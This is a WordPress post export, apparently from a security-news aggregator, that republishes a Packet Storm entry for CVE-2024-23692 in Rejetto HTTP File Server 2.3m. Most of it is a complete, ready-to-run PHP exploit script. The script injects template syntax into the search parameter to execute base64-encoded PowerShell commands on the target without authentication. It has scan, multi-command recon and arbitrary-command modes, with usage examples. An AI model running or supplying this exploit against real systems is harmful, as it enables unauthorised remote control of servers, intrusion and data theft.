{"id":41404,"date":"2026-02-18T12:49:51","date_gmt":"2026-02-18T12:49:51","guid":{"rendered":"http:\/\/localhost\/?p=41404"},"modified":"2026-02-18T12:49:51","modified_gmt":"2026-02-18T12:49:51","slug":"rejetto-http-file-server-23m-unauthenticated-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41404","title":{"rendered":"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:35:48&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215806&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-23692&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Rejetto HTTP File Server 2.3m Unauthenticated RCE                                                                           |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : http:\/\/www.rejetto.com\/hfs\/                                                                                                 |\\n    =============================================================================================================================================\\n    \\n    [+] Summary :\\n    \\n    A critical unauthenticated remote code execution vulnerability exists in Rejetto HTTP File Server (HFS) version 2.3m that allows attackers to execute arbitrary operating system commands \\n    through template injection in the search functionality. The vulnerability enables complete system compromise without authentication.\\n    \\n    [+] Technical Description\\n    \\n    The vulnerability exists in Rejetto HFS&#8217;s template processing engine, specifically in the search functionality. \\n    The application fails to properly sanitize user input in template expressions, allowing attackers to inject and execute arbitrary system commands through crafted template syntax.\\n    \\n    Vulnerable Code Pattern:\\n    \\n    procedure ProcessTemplate(var template: string);\\n    \\n      cmdResult: string;\\n    \\n      if Pos(&#8216;{.exec|&#8217;, template) \\u003e 0 then\\n      \\n        cmdResult := ExecuteCommand(ExtractCommand(template));\\n        template := ReplaceTemplateCommand(template, cmdResult);\\n      end;\\n    end;\\n    \\n    [+] Usage: \\n    \\n    # Vulnerability Scanning\\n    \\n    php exploit.php http:\/\/target:8080 &#8211;scan\\n    \\n    # Execute a Specific Command\\n    \\n    php exploit.php http:\/\/target:8080 \\&#8221;whoami\\&#8221;\\n    php exploit.php http:\/\/target:8080 \\&#8221;ipconfig\\&#8221;\\n    \\n    # Test Multiple Commands\\n    \\n    php exploit.php http:\/\/target:8080 &#8211;test\\n    \\n    [+] POC :\\n    \\n    \\u003c?php\\n    \\n    \\n    class HFSExploit {\\n        private $colors;\\n        \\n        public function __construct() {\\n            $this-\\u003ecolors = [\\n                &#8216;GREEN&#8217;   =\\u003e \\&#8221;\\\\033[1;32m\\&#8221;,\\n                &#8216;MAGENTA&#8217; =\\u003e \\&#8221;\\\\033[1;35m\\&#8221;,\\n                &#8216;CYAN&#8217;    =\\u003e \\&#8221;\\\\033[1;36m\\&#8221;,\\n                &#8216;RED&#8217;     =\\u003e \\&#8221;\\\\033[1;31m\\&#8221;,\\n                &#8216;BLUE&#8217;    =\\u003e \\&#8221;\\\\033[1;34m\\&#8221;,\\n                &#8216;YELLOW&#8217;  =\\u003e \\&#8221;\\\\033[1;33m\\&#8221;,\\n                &#8216;WHITE&#8217;   =\\u003e \\&#8221;\\\\033[1;37m\\&#8221;,\\n                &#8216;RESET&#8217;   =\\u003e \\&#8221;\\\\033[0m\\&#8221;,\\n                &#8216;BOLD&#8217;    =\\u003e \\&#8221;\\\\033[1m\\&#8221;\\n            ];\\n        }\\n        \\n        private function color($text, $color) {\\n            return $this-\\u003ecolors[$color] . $text . $this-\\u003ecolors[&#8216;RESET&#8217;];\\n        }\\n        \\n        private function showBanner() {\\n            $banner = $this-\\u003ecolor(\\&#8221;\\n     \u2588\u2588\u2557\u2588\u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n     \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n     \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588   \u2588\u2554\u255d\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n     \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n     \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\\n     \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\\n    \\&#8221;, &#8216;CYAN&#8217;) . \\n    $this-\\u003ecolor(\\&#8221;\\n    \\n    \\&#8221;, &#8216;MAGENTA&#8217;) .\\n    $this-\\u003ecolor(\\&#8221;\\\\n        CVE-2024-23692 &#8211; Rejetto HFS Unauthenticated RCE\\\\n\\&#8221;, &#8216;RED&#8217;) .\\n    $this-\\u003ecolor(\\&#8221;                    @indoushka\\\\n\\\\n\\&#8221;, &#8216;WHITE&#8217;);\\n    \\n            echo $banner;\\n        }\\n        \\n        private function encodePayload($command) {\\n    \\n            $psCommand = \\&#8221;echo [S]; $command; echo [S];\\&#8221;;\\n            $utf16le = iconv(&#8216;UTF-8&#8217;, &#8216;UTF-16LE&#8217;, $psCommand);\\n            $base64 = base64_encode($utf16le);\\n            \\n            return $base64;\\n        }\\n        \\n        private function makeRequest($url) {\\n            $context = stream_context_create([\\n                &#8216;http&#8217; =\\u003e [\\n                    &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n                    &#8216;timeout&#8217; =\\u003e 15,\\n                    &#8216;ignore_errors&#8217; =\\u003e true,\\n                    &#8216;user_agent&#8217; =\\u003e &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;\\n                ]\\n            ]);\\n            \\n            $response = @file_get_contents($url, false, $context);\\n            \\n            if ($response === false) {\\n                return [&#8216;success&#8217; =\\u003e false, &#8216;error&#8217; =\\u003e &#8216;Request failed&#8217;];\\n            }\\n            $statusCode = 0;\\n            if (isset($http_response_header[0])) {\\n                preg_match(&#8216;\/HTTP\\\\\/\\\\d\\\\.\\\\d\\\\s+(\\\\d+)\/&#8217;, $http_response_header[0], $matches);\\n                $statusCode = isset($matches[1]) ? (int)$matches[1] : 0;\\n            }\\n            \\n            return [\\n                &#8216;success&#8217; =\\u003e true,\\n                &#8216;status_code&#8217; =\\u003e $statusCode,\\n                &#8216;content&#8217; =\\u003e $response\\n            ];\\n        }\\n        \\n        private function extractResult($response) {\\n    \\n            $pattern = &#8216;\/\\\\[S\\\\](.*?)\\\\[S\\\\]\/s&#8217;;\\n            if (preg_match($pattern, $response, $matches)) {\\n                return trim($matches[1]);\\n            }\\n    \\n            $lines = explode(\\&#8221;\\\\n\\&#8221;, $response);\\n            $inResult = false;\\n            $result = [];\\n            \\n            foreach ($lines as $line) {\\n                if (strpos($line, &#8216;[S]&#8217;) !== false) {\\n                    if ($inResult) {\\n                        break;\\n                    } else {\\n                        $inResult = true;\\n                        continue;\\n                    }\\n                }\\n                \\n                if ($inResult) {\\n                    $result[] = $line;\\n                }\\n            }\\n            \\n            return implode(\\&#8221;\\\\n\\&#8221;, $result);\\n        }\\n        \\n        public function exploit($target, $command) {\\n            $this-\\u003eshowBanner();\\n            \\n            $target = rtrim($target, &#8216;\/&#8217;);\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Target: \\&#8221;, &#8216;BLUE&#8217;) . $target . \\&#8221;\\\\n\\&#8221;;\\n            echo $this-\\u003ecolor(\\&#8221;[*] Command: \\&#8221;, &#8216;BLUE&#8217;) . $command . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            $encodedCommand = $this-\\u003eencodePayload($command);\\n            $payload = \\&#8221;\/?n=%0A\\u0026cmd=cmd+\/c+powershell+-enc+$encodedCommand\\u0026search=%25xxx%25url%25:%password%\\\\}\\\\{.exec|\\\\{.?cmd.\\\\}|timeout=15|out=abc.\\\\}\\\\{.?n.\\\\}\\\\{.?n.\\\\}RESULT:\\\\{.?n.\\\\}\\\\{.^abc.\\\\}====\\\\{.?n.\\\\}\\&#8221;;\\n            \\n            $exploitUrl = $target . $payload;\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Trying to exploit&#8230;\\&#8221;, &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            echo $this-\\u003ecolor(\\&#8221;[*] Exploit URL: \\&#8221;, &#8216;CYAN&#8217;) . $exploitUrl . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            \\n            $response = $this-\\u003emakeRequest($exploitUrl);\\n            \\n            if (!$response[&#8216;success&#8217;]) {\\n                echo $this-\\u003ecolor(\\&#8221;[-] Exploitation failed: \\&#8221; . $response[&#8216;error&#8217;], &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                return;\\n            }\\n            \\n            if ($response[&#8216;status_code&#8217;] !== 200) {\\n                echo $this-\\u003ecolor(\\&#8221;[-] Server returned status: \\&#8221; . $response[&#8216;status_code&#8217;], &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                return;\\n            }\\n            \\n            $result = $this-\\u003eextractResult($response[&#8216;content&#8217;]);\\n            \\n            if (empty(trim($result))) {\\n                echo $this-\\u003ecolor(\\&#8221;[-] No command output received\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                echo $this-\\u003ecolor(\\&#8221;[*] Full response for debugging:\\\\n\\&#8221;, &#8216;YELLOW&#8217;);\\n                echo $response[&#8216;content&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n            } else {\\n                echo $this-\\u003ecolor(\\&#8221;[+] Exploitation successful!\\&#8221;, &#8216;GREEN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                echo $this-\\u003ecolor(\\&#8221;[+] Command output:\\\\n\\&#8221;, &#8216;GREEN&#8217;);\\n                echo $this-\\u003ecolor(str_repeat(\\&#8221;=\\&#8221;, 60), &#8216;CYAN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                echo $result . \\&#8221;\\\\n\\&#8221;;\\n                echo $this-\\u003ecolor(str_repeat(\\&#8221;=\\&#8221;, 60), &#8216;CYAN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            }\\n        }\\n        \\n        public function testCommands($target) {\\n            $this-\\u003eshowBanner();\\n            \\n            $target = rtrim($target, &#8216;\/&#8217;);\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Testing common commands on: \\&#8221;, &#8216;BLUE&#8217;) . $target . \\&#8221;\\\\n\\\\n\\&#8221;;\\n            \\n            $testCommands = [\\n                &#8216;whoami&#8217; =\\u003e &#8216;Current user&#8217;,\\n                &#8216;hostname&#8217; =\\u003e &#8216;System hostname&#8217;,\\n                &#8216;ipconfig&#8217; =\\u003e &#8216;Network configuration&#8217;,\\n                &#8216;systeminfo&#8217; =\\u003e &#8216;System information&#8217;,\\n                &#8216;dir&#8217; =\\u003e &#8216;Directory listing&#8217;,\\n                &#8216;net users&#8217; =\\u003e &#8216;Local users&#8217;\\n            ];\\n            \\n            foreach ($testCommands as $cmd =\\u003e $description) {\\n                echo $this-\\u003ecolor(\\&#8221;[*] Testing: \\&#8221;, &#8216;YELLOW&#8217;) . $description . \\&#8221; (\\&#8221; . $cmd . \\&#8221;)\\\\n\\&#8221;;\\n                \\n                $encodedCommand = $this-\\u003eencodePayload($cmd);\\n                $payload = \\&#8221;\/?n=%0A\\u0026cmd=cmd+\/c+powershell+-enc+$encodedCommand\\u0026search=%25xxx%25url%25:%password%\\\\}\\\\{.exec|\\\\{.?cmd.\\\\}|timeout=15|out=abc.\\\\}\\\\{.?n.\\\\}\\\\{.?n.\\\\}RESULT:\\\\{.?n.\\\\}\\\\{.^abc.\\\\}====\\\\{.?n.\\\\}\\&#8221;;\\n                \\n                $exploitUrl = $target . $payload;\\n                \\n                $response = $this-\\u003emakeRequest($exploitUrl);\\n                \\n                if ($response[&#8216;success&#8217;] \\u0026\\u0026 $response[&#8216;status_code&#8217;] === 200) {\\n                    $result = $this-\\u003eextractResult($response[&#8216;content&#8217;]);\\n                    \\n                    if (!empty(trim($result))) {\\n                        echo $this-\\u003ecolor(\\&#8221;[+] SUCCESS: \\&#8221; . $description, &#8216;GREEN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                        echo $this-\\u003ecolor(\\&#8221;[+] Output: \\&#8221; . trim($result), &#8216;CYAN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                    } else {\\n                        echo $this-\\u003ecolor(\\&#8221;[-] No output received\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                    }\\n                } else {\\n                    echo $this-\\u003ecolor(\\&#8221;[-] Command failed\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                }\\n                echo \\&#8221;\\\\n\\&#8221;;\\n            }\\n        }\\n        \\n        public function scan($target) {\\n            $this-\\u003eshowBanner();\\n            \\n            $target = rtrim($target, &#8216;\/&#8217;);\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Scanning for Rejetto HFS vulnerability: \\&#8221;, &#8216;BLUE&#8217;) . $target . \\&#8221;\\\\n\\\\n\\&#8221;;\\n    \\n            $testCommand = \\&#8221;echo VULNERABLE\\&#8221;;\\n            $encodedCommand = $this-\\u003eencodePayload($testCommand);\\n            $payload = \\&#8221;\/?n=%0A\\u0026cmd=cmd+\/c+powershell+-enc+$encodedCommand\\u0026search=%25xxx%25url%25:%password%\\\\}\\\\{.exec|\\\\{.?cmd.\\\\}|timeout=15|out=abc.\\\\}\\\\{.?n.\\\\}\\\\{.?n.\\\\}RESULT:\\\\{.?n.\\\\}\\\\{.^abc.\\\\}====\\\\{.?n.\\\\}\\&#8221;;\\n            \\n            $exploitUrl = $target . $payload;\\n            \\n            echo $this-\\u003ecolor(\\&#8221;[*] Sending test payload&#8230;\\&#8221;, &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n            \\n            $response = $this-\\u003emakeRequest($exploitUrl);\\n            \\n            if ($response[&#8216;success&#8217;] \\u0026\\u0026 $response[&#8216;status_code&#8217;] === 200) {\\n                $result = $this-\\u003eextractResult($response[&#8216;content&#8217;]);\\n                \\n                if (strpos($result, &#8216;VULNERABLE&#8217;) !== false) {\\n                    echo $this-\\u003ecolor(\\&#8221;[+] TARGET IS VULNERABLE to CVE-2024-23692!\\&#8221;, &#8216;GREEN&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                    return true;\\n                } else {\\n                    echo $this-\\u003ecolor(\\&#8221;[-] Target does not appear to be vulnerable\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                    echo $this-\\u003ecolor(\\&#8221;[*] Response: \\&#8221; . substr($response[&#8216;content&#8217;], 0, 200), &#8216;YELLOW&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                    return false;\\n                }\\n            } else {\\n                echo $this-\\u003ecolor(\\&#8221;[-] Target not accessible or error occurred\\&#8221;, &#8216;RED&#8217;) . \\&#8221;\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n    }\\n    \\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        if ($argc \\u003c 2) {\\n            echo \\&#8221;CVE-2024-23692 &#8211; Rejetto HTTP File Server RCE Exploit\\\\n\\&#8221;;\\n            echo \\&#8221;Usage:\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php \\u003ctarget_url\\u003e \\u003ccommand\\u003e\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php \\u003ctarget_url\\u003e &#8211;test\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php \\u003ctarget_url\\u003e &#8211;scan\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nExamples:\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php http:\/\/target:8080 \\\\\\&#8221;whoami\\\\\\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php http:\/\/target:8080 \\\\\\&#8221;ipconfig\\\\\\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php http:\/\/target:8080 &#8211;test\\\\n\\&#8221;;\\n            echo \\&#8221;  php exploit.php http:\/\/target:8080 &#8211;scan\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nDescription:\\\\n\\&#8221;;\\n            echo \\&#8221;  Exploits unauthenticated RCE vulnerability in Rejetto HTTP File Server 2.3m\\\\n\\&#8221;;\\n            echo \\&#8221;  via template injection in search parameter (CVE-2024-23692)\\\\n\\&#8221;;\\n            exit(0);\\n        }\\n        \\n        $target = $argv[1];\\n        $command = $argv[2] ?? &#8216;&#8211;scan&#8217;;\\n        \\n        if (!filter_var($target, FILTER_VALIDATE_URL)) {\\n            echo \\&#8221;Error: Invalid target URL\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $exploit = new HFSExploit();\\n        \\n        switch ($command) {\\n            case &#8216;&#8211;test&#8217;:\\n                $exploit-\\u003etestCommands($target);\\n                break;\\n            case &#8216;&#8211;scan&#8217;:\\n                $exploit-\\u003escan($target);\\n                break;\\n            default:\\n                $exploit-\\u003eexploit($target, $command);\\n                break;\\n        }\\n    } else {\\n        echo \\&#8221;This script is intended for command line use only.\\\\n\\&#8221;;\\n    }\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215806&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215806\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:35:48&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Rejetto HTTP File&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-41404","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41404\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:35:48&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for an unauthenticated remote code execution vulnerability in Rejetto HTTP File Server version 2.3m that leverages template injection&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Rejetto HTTP File...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41404\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T12:49:51+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806\",\"datePublished\":\"2026-02-18T12:49:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\"},\"wordCount\":1601,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\",\"name\":\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T12:49:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41404\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41404#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Rejetto HTTP File Server 2.3m Unauthenticated Remote Code Execution_PACKETSTORM:215806\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 